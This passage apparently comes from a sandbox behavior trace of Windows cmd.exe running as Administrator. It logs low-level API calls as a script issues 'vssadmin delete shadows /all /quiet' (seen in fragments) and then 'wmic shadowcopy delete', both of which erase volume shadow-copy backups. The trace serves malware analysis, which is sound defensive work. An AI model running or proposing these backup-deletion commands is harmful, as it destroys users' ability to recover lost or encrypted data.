cbMultiByte=1, lpWideCharStr=0x4ab4e338, cchWideChar=1 | out: lpWideCharStr="ote shadows /all /quiet\n") returned 1 [0208.592] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.592] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.592] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33a, cchWideChar=1 | out: lpWideCharStr="pe shadows /all /quiet\n") returned 1 [0208.592] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.592] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.592] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33c, cchWideChar=1 | out: lpWideCharStr="y shadows /all /quiet\n") returned 1 [0208.592] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.592] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.592] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33e, cchWideChar=1 | out: lpWideCharStr=" shadows /all /quiet\n") returned 1 [0208.592] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.592] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.592] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e340, cchWideChar=1 | out: lpWideCharStr="dhadows /all /quiet\n") returned 1 [0208.592] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.592] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.592] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e342, cchWideChar=1 | out: lpWideCharStr="eadows /all /quiet\n") returned 1 [0208.592] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.592] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.592] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.592] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e344, cchWideChar=1 | out: lpWideCharStr="ldows /all /quiet\n") returned 1 [0208.592] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.592] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.592] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e346, cchWideChar=1 | out: lpWideCharStr="eows /all /quiet\n") returned 1 [0208.593] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.593] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.593] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e348, cchWideChar=1 | out: lpWideCharStr="tws /all /quiet\n") returned 1 [0208.593] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.593] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.593] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34a, cchWideChar=1 | out: lpWideCharStr="es /all /quiet\n") returned 1 [0208.593] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.593] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.593] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0208.593] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34c, cchWideChar=1 | out: lpWideCharStr="\n /all /quiet\n") returned 1 [0208.593] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.593] GetFileType (hFile=0x9c) returned 0x3 [0208.593] _get_osfhandle (_FileHandle=0) returned 0x9c [0208.593] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.593] _get_osfhandle (_FileHandle=1) returned 0xa8 [0208.593] GetFileType (hFile=0xa8) returned 0x3 [0208.593] _get_osfhandle (_FileHandle=1) returned 0xa8 [0208.593] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="wmic shadowcopy delete\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wmic shadowcopy delete\n", lpUsedDefaultChar=0x0) returned 24 [0208.593] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x1efb98, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1efb98*=0x17, lpOverlapped=0x0) returned 1 [0208.593] GetProcessHeap () returned 0x2e0000 [0208.593] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x2ffe70 [0208.593] GetProcessHeap () returned 0x2e0000 [0208.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ffe70 | out: hHeap=0x2e0000) returned 1 [0208.594] GetProcessHeap () returned 0x2e0000 [0208.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97c0 [0208.594] GetProcessHeap () returned 0x2e0000 [0208.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1a) returned 0x2f4610 [0208.594] GetProcessHeap () returned 0x2e0000 [0208.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x36) returned 0x2f6510 [0208.594] GetConsoleOutputCP () returned 0x1b5 [0208.594] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0208.594] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0208.594] GetConsoleTitleW (in: lpConsoleTitle=0x1efb50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2faa10 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x40) returned 0x2ffea0 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2e1320 [0208.595] SetErrorMode (uMode=0x0) returned 0x0 [0208.595] SetErrorMode (uMode=0x1) returned 0x0 [0208.595] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e1330, lpFilePart=0x1ef3e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef3e0*="system32") returned 0x13 [0208.595] SetErrorMode (uMode=0x0) returned 0x1 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1320, Size=0x42) returned 0x2e1320 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1320) returned 0x42 [0208.595] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0208.595] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x104) returned 0x2f5b70 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1f8) returned 0x2f9be0 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9be0, Size=0x106) returned 0x2f9be0 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9be0) returned 0x106 [0208.595] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2f9d00 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9d00, Size=0x7e) returned 0x2f9d00 [0208.595] GetProcessHeap () returned 0x2e0000 [0208.595] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9d00) returned 0x7e [0208.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0208.596] GetLastError () returned 0x2 [0208.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0208.596] GetLastError () returned 0x2 [0208.596] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0208.596] GetLastError () returned 0x2 [0208.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0208.596] GetLastError () returned 0x2 [0208.596] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0208.596] GetLastError () returned 0x2 [0208.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0208.597] GetLastError () returned 0x2 [0208.597] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0x2f5c80 [0208.597] FindClose (in: hFindFile=0x2f5c80 | out: hFindFile=0x2f5c80) returned 1 [0208.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0208.597] GetLastError () returned 0x2 [0208.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0x2f5c80 [0208.597] FindClose (in: hFindFile=0x2f5c80 | out: hFindFile=0x2f5c80) returned 1 [0208.597] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0208.597] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0208.597] GetConsoleTitleW (in: lpConsoleTitle=0x1ef6a0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0208.597] GetProcessHeap () returned 0x2e0000 [0208.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2e1380 [0208.597] GetConsoleTitleW (in: lpConsoleTitle=0x2e1390, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0208.598] GetProcessHeap () returned 0x2e0000 [0208.598] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1380, Size=0xa6) returned 0x2e1380 [0208.598] GetProcessHeap () returned 0x2e0000 [0208.598] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1380) returned 0xa6 [0208.598] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - wmic shadowcopy delete") returned 1 [0208.598] GetProcessHeap () returned 0x2e0000 [0208.598] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1380 | out: hHeap=0x2e0000) returned 1 [0208.598] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef458, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef418 | out: lpAttributeList=0x1ef458, lpSize=0x1ef418) returned 1 [0208.598] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef458, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef458, lpPreviousValue=0x0) returned 1 [0208.598] GetStartupInfoW (in: lpStartupInfo=0x1ef570 | out: lpStartupInfo=0x1ef570*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9c, hStdOutput=0xa8, hStdError=0xa8)) [0208.598] GetProcessHeap () returned 0x2e0000 [0208.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4640 [0208.598] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0208.598] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0208.598] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0208.598] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0208.598] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0208.599] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0208.599] GetProcessHeap () returned 0x2e0000 [0208.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4640 | out: hHeap=0x2e0000) returned 1 [0208.599] GetProcessHeap () returned 0x2e0000 [0208.599] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2f8900 [0208.599] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ef490*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef440 | out: lpCommandLine="wmic shadowcopy delete", lpProcessInformation=0x1ef440*(hProcess=0x50, hThread=0x54, dwProcessId=0x218, dwThreadId=0x628)) returned 1 [0208.609] CloseHandle (hObject=0x54) returned 1 [0208.609] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.609] GetProcessHeap () returned 0x2e0000 [0208.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ff370 | out: hHeap=0x2e0000) returned 1 [0208.609] GetEnvironmentStringsW () returned 0x2fb240* [0208.609] GetProcessHeap () returned 0x2e0000 [0208.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0208.609] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0208.609] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x1eed48, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1eed48, ReturnLength=0x0) returned 0x0 [0208.609] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffda000, lpBuffer=0x1eed80, nSize=0x380, lpNumberOfBytesRead=0x1eed40 | out: lpBuffer=0x1eed80*, lpNumberOfBytesRead=0x1eed40*=0x380) returned 1 [0208.609] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0212.769] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1ef388 | out: lpExitCode=0x1ef388*=0x0) returned 1 [0212.769] CloseHandle (hObject=0x50) returned 1 [0212.769] _vsnwprintf (in: _Buffer=0x1ef5f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef398 | out: _Buffer="00000000") returned 8 [0212.769] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0212.769] GetProcessHeap () returned 0x2e0000 [0212.769] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8980 | out: hHeap=0x2e0000) returned 1 [0212.769] GetEnvironmentStringsW () returned 0x2fb240* [0212.769] GetProcessHeap () returned 0x2e0000 [0212.769] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0212.769] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0212.769] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.769] GetProcessHeap () returned 0x2e0000 [0212.769] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8980 | out: hHeap=0x2e0000) returned 1 [0212.769] GetEnvironmentStringsW () returned 0x2fb240* [0212.769] GetProcessHeap () returned 0x2e0000 [0212.769] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0212.769] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0212.769] GetProcessHeap () returned 0x2e0000 [0212.769] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8900 | out: hHeap=0x2e0000) returned 1 [0212.769] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef458 | out: lpAttributeList=0x1ef458) [0212.769] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0212.770] _get_osfhandle (_FileHandle=1) returned 0xa8 [0212.770] SetConsoleMode (hConsoleHandle=0xa8, dwMode=0x0) returned 0 [0212.770] _get_osfhandle (_FileHandle=1) returned 0xa8 [0212.770] GetConsoleMode (in: hConsoleHandle=0xa8, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 0 [0212.770] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.770] GetConsoleMode (in: hConsoleHandle=0x9c, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 0 [0212.770] GetConsoleOutputCP () returned 0x1b5 [0212.770] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0212.770] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0212.770] GetProcessHeap () returned 0x2e0000 [0212.770] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9d00 | out: hHeap=0x2e0000) returned 1 [0212.770] GetProcessHeap () returned 0x2e0000 [0212.770] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0212.770] GetProcessHeap () returned 0x2e0000 [0212.770] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5b70 | out: hHeap=0x2e0000) returned 1 [0212.771] GetProcessHeap () returned 0x2e0000 [0212.771] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1320 | out: hHeap=0x2e0000) returned 1 [0212.771] GetProcessHeap () returned 0x2e0000 [0212.771] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ffea0 | out: hHeap=0x2e0000) returned 1 [0212.771] GetProcessHeap () returned 0x2e0000 [0212.771] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, 